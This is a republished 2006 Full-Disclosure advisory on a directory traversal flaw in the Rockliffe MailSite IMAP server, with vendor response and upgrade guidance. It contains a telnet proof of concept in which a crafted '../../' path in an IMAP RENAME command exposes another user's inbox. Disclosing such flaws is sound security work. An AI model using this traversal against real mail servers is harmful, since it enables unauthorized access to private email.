Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:10897
HistoryJan 04, 2006 - 12:00 a.m.

[Full-disclosure] Rockliffe Directory Transversal Vulnerability

2006-01-0400:00:00
vulners.com
10
JSON

Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.

Product: Rockliffe Mailsite
http://www.rockliffe.com

Version: Confirmed on Mailsite < 6.1.22.1

Author: Josh Zlatin-Amishav

Date: January 4, 2006

Background:
Rockliffe MailSite secure email server software and MailSite MP secure email
gateways provide email server solutions and gateway email protection for
businesses and service providers. Rockliffe has more than 3,000 customers
hosting more than 15 million mailboxes worldwide.

Issue:
In working with researchers at Tenable Network Security, I have come across
a directory transversal flaw in the IMAP server. It is possible for an
authenticated user to access any user's inbox via a RENAME command.

PoC:

josh@lab1:~$ telnet 10.0.0.5 143
Trying 10.0.0.5…
Connected to 10.0.0.5.
Escape character is '^]'.

  • OK MailSite IMAP4 Server 6.1.22.0 ready
    a1 login joe pass
    a1 OK LOGIN completed
    a2 rename …/…/josh/INBOX gotcha
    a2 OK RENAME folder …/…/josh/INBOX renamed to gotcha
    a3 select gotcha
  • FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
  • 0 EXISTS
  • 0 RECENT
  • OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
  • OK [UNSEEN 0]
  • OK [UIDVALIDITY 514563061] UIDs are valid
    a3 OK [READ-WRITE] opened gotcha

user joe can now access the contents of user josh's INBOX directory.

Vendor notified: January 3, 2006 06:12AM

Vendor Response:
Contact your sales rep about purchasing Mailsite 7.0.3.1

Solution:
Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
the directory transversal problem. Either upgrade to version 6.1.22 and install
the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
Mailsite. The hotfix can be obtained at:

ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe

References: http://www.rockliffe.com
References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON